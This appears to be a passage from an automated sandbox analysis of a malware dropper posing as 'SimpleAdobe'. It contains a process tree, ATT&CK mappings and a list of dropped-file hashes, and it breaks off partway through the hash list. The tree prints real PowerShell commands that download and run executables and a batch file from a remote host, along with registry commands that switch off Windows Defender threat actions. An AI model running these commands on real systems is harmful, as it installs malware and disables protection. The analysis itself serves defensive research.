C:\Users\Admin\Documents\SimpleAdobe\CiFpcyOnXOGYemn3ri8WhBQX.exe
C:\Users\Admin\Documents\SimpleAdobe\CiFpcyOnXOGYemn3ri8WhBQX.exe
2⤵
- Executes dropped EXE
PID:3544

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3544 -s 2376
3⤵
- Program crash
PID:5492

C:\Users\Admin\Documents\SimpleAdobe\Y7zf0Pc4bCTYqVWDQQuu6KNv.exe
C:\Users\Admin\Documents\SimpleAdobe\Y7zf0Pc4bCTYqVWDQQuu6KNv.exe
2⤵
- Executes dropped EXE
PID:8

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
3⤵
- Command and Scripting Interpreter: PowerShell
PID:4160

C:\Users\Admin\Documents\SimpleAdobe\Y7zf0Pc4bCTYqVWDQQuu6KNv.exe
"C:\Users\Admin\Documents\SimpleAdobe\Y7zf0Pc4bCTYqVWDQQuu6KNv.exe"
3⤵
PID:4332

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -nologo -noprofile
4⤵
- Command and Scripting Interpreter: PowerShell
PID:5324

C:\Users\Admin\Documents\SimpleAdobe\We8WDoTp14qjxDqiFqOfzC3w.exe
C:\Users\Admin\Documents\SimpleAdobe\We8WDoTp14qjxDqiFqOfzC3w.exe
2⤵
- Modifies firewall policy service
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:552

C:\Users\Admin\Documents\SimpleAdobe\qqUYHz7hpiGnsYZ0pQXKX3S7.exe
C:\Users\Admin\Documents\SimpleAdobe\qqUYHz7hpiGnsYZ0pQXKX3S7.exe
2⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1624

C:\Windows\SysWOW64\cmd.exe
"cmd" /c "C:\Users\Admin\AppData\Local\Temp\nsrA3E2.tmp\app.bat"
3⤵
PID:2152

C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
4⤵
PID:4828

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d2iv78ooxaijb6.cloudfront.net/load/th.php?a=2836&c=1000','stat')"
4⤵
- Command and Scripting Interpreter: PowerShell
PID:3932

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -Command "(New-Object Net.WebClient).DownloadFile('https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=425&c=1000','i1.exe')"
4⤵
- Command and Scripting Interpreter: PowerShell
PID:2172

C:\Users\Admin\AppData\Local\Temp\i1.exe
i1.exe /SUB=2838 /str=one
4⤵
PID:5432

C:\Users\Admin\AppData\Local\Temp\u46w.0.exe
"C:\Users\Admin\AppData\Local\Temp\u46w.0.exe"
5⤵
PID:2628

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile('https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=443', 'i2.bat')"
4⤵
- Command and Scripting Interpreter: PowerShell
PID:5480

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K i2.bat
4⤵
PID:6028

C:\Users\Admin\Documents\SimpleAdobe\KjJH5rfu3xQ3MaIyvqkCMEN3.exe
C:\Users\Admin\Documents\SimpleAdobe\KjJH5rfu3xQ3MaIyvqkCMEN3.exe
2⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:3620

C:\Users\Admin\Documents\SimpleAdobe\oMrlDCTvmAxfECLAbEdfOWdI.exe
C:\Users\Admin\Documents\SimpleAdobe\oMrlDCTvmAxfECLAbEdfOWdI.exe
2⤵
- Executes dropped EXE
PID:1980

C:\Users\Admin\Documents\SimpleAdobe\4zrKhJHoSFlQt9dU5SOizEot.exe
C:\Users\Admin\Documents\SimpleAdobe\4zrKhJHoSFlQt9dU5SOizEot.exe
2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2544

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:4828

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
3⤵
PID:4520

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4520 -s 2080
4⤵
- Program crash
PID:6108

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2544 -s 304
3⤵
- Program crash
PID:4728

C:\Users\Admin\Documents\SimpleAdobe\SbQz1Z1_PlLLcuWevDUz5NO2.exe
C:\Users\Admin\Documents\SimpleAdobe\SbQz1Z1_PlLLcuWevDUz5NO2.exe
2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:1396

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:4840

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:1992

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 440 -p 2544 -ip 2544
1⤵
PID:2596

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
1⤵
PID:4676

C:\Users\Admin\AppData\Local\Temp\7zSA76B.tmp\Install.exe
C:\Users\Admin\AppData\Local\Temp\7zSA76B.tmp\Install.exe eW /JMwdidHemw 525403 /S
1⤵
PID:4968

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
2⤵
PID:5192

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
3⤵
PID:5304

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
4⤵
PID:5324

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
5⤵
PID:5340

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
3⤵
PID:5472

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
4⤵
PID:5544

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
5⤵
PID:5692

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
3⤵
PID:5732

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
4⤵
PID:5748

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
5⤵
PID:5768

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
3⤵
PID:5844

C:\Windows\SysWOW64\cmd.exe
/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
4⤵
PID:5864

\??\c:\windows\SysWOW64\reg.exe
reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
5⤵
PID:5876

C:\Windows\SysWOW64\forfiles.exe
forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
3⤵
PID:5892

C:\Windows\SysWOW64\cmd.exe
/C powershell start-process -WindowStyle Hidden gpupdate.exe /force
4⤵
PID:5912

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell start-process -WindowStyle Hidden gpupdate.exe /force
5⤵
- Command and Scripting Interpreter: PowerShell
PID:5928

C:\Windows\SysWOW64\gpupdate.exe
"C:\Windows\system32\gpupdate.exe" /force
6⤵
PID:216

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
2⤵
PID:5692

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 3544 -ip 3544
1⤵
PID:5380

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4520 -ip 4520
1⤵
PID:6080

Network

MITRE ATT&CK Matrix ATT&CK v13

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Modify Registry

T1112

Virtualization/Sandbox Evasion

T1497

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Resource Development

Reconnaissance

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\AEHIDAKE
Filesize
116KB

MD5
f70aa3fa04f0536280f872ad17973c3d

SHA1
50a7b889329a92de1b272d0ecf5fce87395d3123

SHA256
8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8

SHA512
30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

Download Submit
C:\ProgramData\Are.docx
Filesize
11KB

MD5
a33e5b189842c5867f46566bdbf7a095

SHA1
e1c06359f6a76da90d19e8fd95e79c832edb3196

SHA256
5abf8e3d1f78de7b09d7f6fb87f9e80e60caacf13ef3c1289665653dacd7c454

SHA512
f2ad3812ec9b915e9618539b0f103f2e9acaad25fbbacd84941c954ce070af231324e83a4621e951c1dbae8d40d50410954e40dd52bbd46e34c54b0d1957407b

Download Submit
C:\ProgramData\HJEHIJEB
Filesize
114KB

MD5
4808263efeec1019f450544f9b314ef3

SHA1
8864bd10d2f34adbe3c6abfb7cad1c900d5d2600

SHA256
37cf3ea98c38978a62b53f6162e17ec5c617a4d86a9dcdb2da19f9977ec584a9

SHA512
5d607c7b8db405066c5d9d354f18016db71b7d93f25b58d65844fdb94b3c635734ffb4c8936c4a8660211afef025e39b350180105f049eb79d9bb25315f5ec3d

Download Submit
C:\ProgramData\freebl3.dll
Filesize
117KB

MD5
4150344148127d7346c9ce87573b10e1

SHA1
ba06769c78ef38132ac8c047eea3e6f578e04748

SHA256
834135b991ee947b4a5747c8c286fe20b9dff4f44d3274b06c6ac209b94443c4

SHA512
c919614af2adf4107a0d11483616b8789ea0621fe455a3b2ee16763c24747bb7c4f56f33555f9288358234aa9ace6bf13997774554ea651c25cb57342db8800e

Download Submit
C:\ProgramData\mozglue.dll
Filesize
593KB

MD5
c8fd9be83bc728cc04beffafc2907fe9

SHA1
95ab9f701e0024cedfbd312bcfe4e726744c4f2e

SHA256
ba06a6ee0b15f5be5c4e67782eec8b521e36c107a329093ec400fe0404eb196a

SHA512
fbb446f4a27ef510e616caad52945d6c9cc1fd063812c41947e579ec2b54df57c6dc46237ded80fca5847f38cbe1747a6c66a13e2c8c19c664a72be35eb8b040

Download Submit
C:\ProgramData\mozglue.dll
Filesize
96KB

MD5
75fd06b259094b45aa25e11ae4ab34cb

SHA1
d4eba60454ac64fd0a7c316d26a9117198ebfb7e

SHA256
90712bbbe8f2fd7b7830f1fab89d8ab9c5df45c487d6296ee41e596190bd68b9

SHA512
c61b9f292a0ea76541fde29225aac2513c741a4dfe16a9240b857476766b4d84a8e0c033cdae78811073eb1473e87f04f6b9a6428b11e815ad186919e614d4e9

Download Submit
C:\ProgramData\nss3.dll
Filesize
2.0MB

MD5
1cc453cdf74f31e4d913ff9c10acdde2

SHA1
6e85eae544d6e965f15fa5c39700fa7202f3aafe

SHA256
ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

SHA512
dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

Download Submit
C:\Users\Admin\AppData\Local\Auditorium\auditorium.exe
Filesize
2.7MB

MD5
f7f42a4efc11b77c6c4d8f73a61f8904

SHA1
7814bd31069cb069faf1d32f74109ee626c9cdc0

SHA256
fdec540efd840999823ce83ccf4954b1af6ad40dff157a31eb7f10a889bafcf1

SHA512
484047589dfb6816bb67fee62c19bbf39964b13d0ab06610e568331715fd6114ee9007434042444af38d33d2ef005c78f2a3dd02665b8d8d096dd4dba6e526a1

Download Submit
C:\Users\Admin\AppData\Local\Auditorium\libeay32.dll
Filesize
2.3MB

MD5
5afad5dd0bae7f01c2be79f9f168c9e8

SHA1
553fe32e9cc002b3357c11de74478b85b04657bc

SHA256
4c5c6debe9453f0343f163aa72b7049f3167bc08d3b2d549fcabc4ee6bfbafcd

SHA512
3f78196965db2fa5f6a13fecd9d93abbbaafaa52a6b43e8bd957d3b1e52bc3930db2d72e79cd34315f56b9758ed37a5d6b122533351d90296abfe8ca7f62fb3f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
Filesize
1KB

MD5
def65711d78669d7f8e69313be4acf2e

SHA1
6522ebf1de09eeb981e270bd95114bc69a49cda6

SHA256
aa1c97cdbce9a848f1db2ad483f19caa535b55a3a1ef2ad1260e0437002bc82c

SHA512
05b2f9cd9bc3b46f52fded320b68e05f79b2b3ceaeb13e5d87ae9f8cd8e6c90bbb4ffa4da8192c2bfe0f58826cabff2e99e7c5cc8dd47037d4eb7bfc6f2710a7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
15KB

MD5
9826fe1c55a7f8f88e5ee3e2ec84c638

SHA1
c68e4daa5f0a2369a0bfcc82491c2ce643b43fa0

SHA256
3acdc8a47d056f66b57a1e8aed835f5333e4d7b891d28c7c7a86a0470c65ee09

SHA512
939953310b06e4069b218c56df2c2249c2629ddf15907ec7f92f498ff9181f38d48b9c130c65589625550fcb88ef26747ccbbcee4651ede4a74964d68d387b99

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
16KB

MD5
356d75bec75cd6ae4d1d03c092616ace

SHA1
24ad341d9c7f8f7adf577cc6881ea4d4c9743989

SHA256
62ea6d13118fe5fa65958b92495989ccfa70d88c3f59ea2ab7b929c6f37fdfd5

SHA512
ad2558bdcfaa4afb8a3f18bc9f394a28aeec6a2134597e9c99514730da522671c5e5b7b0ba61eed421044f92b2c399b3fdafbb6f71b35c30722f9697fbea711e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Filesize
16KB

MD5
a15009956643edc16d5fe77d389fa320

SHA1
cc75dc03868cdac0bab2588cacb7f01114452ad2

SHA256
3818e2f7ced0688a0c9a4bb8801c157e85069722d08fe070c25ff9095fcb404e

SHA512
466344a174a3e169ff06759a6077e6e37a90f343bb3e465d9ef44b007b8091b35d85d8993d48d0e29415bd7ed75241273bce4862845055e334851d7c56239e4b

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS9D59.tmp\Install.exe
Filesize
6.3MB

MD5
802fd12f1f7c3ee9288286c604ea5e42

SHA1
20d128b4da7ade3f0026d2be17f38131a01fc2ed

SHA256
3fe854231e11d4a12e7fcde6bd6bf6ad87b121629034bd600cf3b77b6861cf34

SHA512
c55df152d84d7ca0f97ecea2764612c1ef9199d2935c1268fe4fd3060ca5a2dcaeb1517203aa171f24a374f5436b8cb308e2cf28dc4bf603e1c8c0ab043772ab

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zSA76B.tmp\Install.exe
Filesize
6.5MB

MD5
8ac74b0ff28711c816384cc66a91e70d

SHA1
3067f494214d612c31ffbe0419cb4a661a6fa7f8

SHA256
8c437a3f2a7a941805eb65e15ece46a9dacd893f48d6bb7b17e2ceb73d6e8226

SHA512
1c737ab18ac8f007d4ca8c4f0a31fea605f628775b8bda6134609a217fb3dece718716cf37ded5ec9a76927d35ea9c08d7edf1aef0f14df73daf0c756e208702

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_0gkr5m4t.tpf.ps1
Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\i1.exe
Filesize
417KB

MD5
1ef6b3b23fd623b8fe5a247cb896a8bc

SHA1
67b28733f1189720ef98424910bd674546c4b7e1

SHA256
d42e7fbf0fa05e38da6ba373edf1783c7879cad8de03b289b70ecb643ad04fb9

SHA512
6e5a7bb29cf9087e1a639c5e5ff36a21ad8f98a29232d3ebac415ce27f4c24f18597c5de5ff39e171715f2d5b92fb23d83dca8e6ef08215b38ca263bca662a2f

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-7KE64.tmp\4QjVfZG6nJuiLXB4UdyNXwMr.tmp
Filesize
695KB

MD5
b1e60cbeef7952fa7c791f976e1ee603

SHA1
eb11dd83bbe04b83bbfad6afb67bbbe8509e9e7e

SHA256
4662a8b9bcd13cb316a6f389e3814fd39b88d524dad67525ef751e2452b0cd3b

SHA512
f766e62aa377c289d7ddd859d8590a4df5c9fdf610795aefd4deae5bc1a9d3903bad285db7d5e4c2d05d80f7798d6188cc1dd374312acd19ba1d140e463b9a47

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-C8LFL.tmp\_isetup\_iscrypt.dll
Filesize
2KB

MD5
a69559718ab506675e907fe49deb71e9

SHA1
bc8f404ffdb1960b50c12ff9413c893b56f2e36f

SHA256
2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc

SHA512
e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

Download Submit
C:\Users\Admin\AppData\Local\Temp\is-C8LFL.tmp\_isetup\_isdecmp.dll
Filesize
13KB

MD5
a813d18268affd4763dde940246dc7e5

SHA1
c7366e1fd925c17cc6068001bd38eaef5b42852f

SHA256
e19781aabe466dd8779cb9c8fa41bbb73375447066bb34e876cf388a6ed63c64

SHA512
b310ed4cd2e94381c00a6a370fcb7cc867ebe425d705b69caaaaffdafbab91f72d357966916053e72e68ecf712f2af7585500c58bb53ec3e1d539179fcb45fb4

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsrA3E2.tmp\INetC.dll
Filesize
25KB

MD5
40d7eca32b2f4d29db98715dd45bfac5

SHA1
124df3f617f562e46095776454e1c0c7bb791cc7

SHA256
85e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9

SHA512
5fd4f516ce23fb7e705e150d5c1c93fc7133694ba495fb73101674a528883a013a34ab258083aa7ce6072973b067a605158316a4c9159c1b4d765761f91c513d

Download Submit
C:\Users\Admin\AppData\Local\Temp\nsrA3E2.tmp\app.bat
Filesize
549B

MD5
88056644df36b3ec958fd393ed75493c

SHA1
d8e6d3ea62fb2895d775544031345e645df5b92d

SHA256
f1f8322c55b1bb14fcfe8cf006ab9696558ea740ae8fc49a459bdb930845136d

SHA512
fc416090118f1a3c4386f5e61362bd33dc1a9a5b70cd8eb44da5793993f3e1b6b82392252caf70e2ef471909eb98d86cd4e88093545f568d162de3a04aa5dfc1

Download Submit
C:\Users\Admin\AppData\Local\Temp\u46w.0.exe
Filesize
273KB

MD5
21ad5f74683b2d37d701316fd8c90c0e

SHA1
df01d96396eede2bed630f535dfc63f5bcae451e

SHA256
e84c0229fe8aeb58dfa040b45f623f9fbe4222dc71cd37e436556aa5531e8fb6

SHA512
02d4bd4ee249a556ceaaecf933d59e31e0a2a373246ae53d0eb0b3756328311d6165ba4382a05f1e8c63bb991f0441521fdfac673591b913e5d1beca51b3f88e

Download Submit
C:\Users\Admin\Documents\SimpleAdobe\4QjVfZG6nJuiLXB4UdyNXwMr.exe
Filesize
5.2MB

MD5
1a193c71cb7c78cbdaf02d17665987cb

SHA1
d9a7915899c1ad94da52e93dd1652acd218a705d

SHA256
c4108481a4ddad2a84aa200dbdf8750e351d589752018dad52e76f204f8d3d40

SHA512
1132ec823aadac0b21e25b175913b22ce7f467240d3f5a3479234c0b88487d17e7297db4c4897fa5313a137f6f30047370d23d2039cce9d4a33bd3f37a0224e6

Download Submit
C:\Users\Admin\Documents\SimpleAdobe\4zrKhJHoSFlQt9dU5SOizEot.exe
Filesize
387KB

MD5
7318bf9884fb2c2c5fd8cd433ec1365b

SHA1
ee3c29a40f2a55c915305535a1d9bd604d6ed2ee

SHA256
26f4752c9c6e47f46a1542f0d3fb360cc90250b5106135c43d66ad096833b1c7

SHA512
b3c024b70352d1c17fa0f475a0e2db28c58e106e4b4bbebbedc68b1d97dedab7fd8a7e562ccc38a77517a928094157fba91dcd64699419a784b35affc5f784e1

Download Submit
C:\Users\Admin\Documents\SimpleAdobe\CiFpcyOnXOGYemn3ri8WhBQX.exe
Filesize
273KB

MD5
276122b8b36aa53c1524686adb5534a8

SHA1
6781137ebdfaba7f85c628db11967f0bc0196ba1

SHA256
bb966ec760e7d47b865267db71182cdcc591613b0375733dcc07017777849594

SHA512
b81f255b70aff2d1955839d15b99c1c2348d8b5a2f2d5af99c498eacf625adf5e7f4b5259312b3c8f551b609a1f4597a0352b44d3d4ac3f9a7ccf5323ef518ad

Download Submit
C:\Users\Admin\Documents\SimpleAdobe\KjJH5rfu3xQ3MaIyvqkCMEN3.exe
Filesize
3.1MB

MD5
86a8f6de1227b94ad627eec9957cb5ce

SHA1
4893c9dcdc9ec1379a571c0384ee52687d49f02a

SHA256
1ed1aeb31961f6f3e8b184e8dc32f16c7445dcc3f72d3ba7409f0e8c9073f73e

SHA512
